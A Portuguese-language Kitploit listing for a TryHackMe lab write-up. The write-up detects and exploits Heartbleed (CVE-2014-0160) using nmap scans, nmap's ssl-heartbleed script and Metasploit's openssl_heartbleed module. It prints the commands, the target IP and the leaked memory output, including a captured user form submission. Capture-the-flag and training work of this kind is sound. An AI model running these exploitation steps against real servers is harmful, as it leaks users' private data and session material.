Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — O objetivo deste projeto foi avaliar um host remoto quanto à vulnerabilidade Heartbleed (CVE-2014-0160), verificar sua presença e explorá-la para extrair informações potencialmente sensíveis da memória do servidor através do protocolo TLS. | Kitploit
Ferramentas/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
Forensia de MemóriaAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

O objetivo deste projeto foi avaliar um host remoto quanto à vulnerabilidade Heartbleed (CVE-2014-0160), verificar sua presença e explorá-la para extrair informações potencialmente sensíveis da memória do servidor através do protocolo TLS.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

Objetivo

O objetivo deste projeto foi avaliar um host remoto quanto à vulnerabilidade Heartbleed (CVE-2014-0160), verificar sua presença e explorá-la para extrair informações potencialmente sensíveis da memória do servidor através do protocolo TLS.

Execução

1. Identificando Serviços Abertos (Nmap)

nmap -sC -sV 52.215.184.158 Resultado:

plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 O certificado TLS era autoassinado e expirado. Isso levantou a suspeita de que a versão do OpenSSL poderia estar desatualizada. Porta alvo: 443.

2. Verificação da Vulnerabilidade Heartbleed (Script Nmap)

nmap -p 443 --script ssl-heartbleed 52.215.184.158 Resultado:

plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 O alvo foi confirmado como vulnerável ao Heartbleed.

3. Exploração (Metasploit Framework)

msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run Resultado:

plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin Memória despejada com sucesso e armazenada localmente para análise.

4. Analisando o Despejo de Memória

strings openssl.heartble_152689.bin | grep -i "THM{" Resultado:

plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} Dados confidenciais, incluindo uma flag de aplicação, foram extraídos com sucesso da memória TLS — confirmando que a vulnerabilidade pode ser explorada na prática para vazar informações sensíveis.

Conclusão

Identifiquei e explorei com sucesso a CVE-2014-0160 em um servidor remoto. O processo incluiu:

  • Detecção da vulnerabilidade com nmap
  • Exploração da falha usando Metasploit
  • Extração de dados enviados por usuários em tempo real (incluindo a flag THM{sSl-Is-BaD}) da memória

Impacto nos Negócios

A presença do Heartbleed em um sistema exposto publicamente representa um risco crítico:

  • Vazamento potencial de chaves privadas TLS
  • Sequestro de sessão
  • Exposição de nomes de usuário, e-mails e entradas sensíveis de usuários
Baixar ferramenta